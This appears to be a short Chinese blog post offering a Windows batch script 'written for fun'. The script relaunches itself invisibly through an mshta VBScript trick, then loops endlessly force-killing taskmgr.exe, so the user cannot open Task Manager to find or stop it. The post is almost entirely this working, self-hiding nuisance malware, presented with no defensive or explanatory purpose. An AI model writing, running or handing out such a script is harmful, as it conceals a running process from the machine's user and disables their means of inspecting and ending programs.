隐藏本身,杀任务管理器

 

  
  
  
  
  1. @echo off  
  2. if "%1" == "h" goto begin  
  3. mshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit  
  4. :begin  
  5. for /l %%i in (1,1,255) do taskkill /f /im taskmgr.exe>nul 2>nul&ping 127.0.1 /n 1>nul  
  6. goto begin 

自己感兴趣写着玩的

你可能感兴趣的:(职场,批处理,休闲)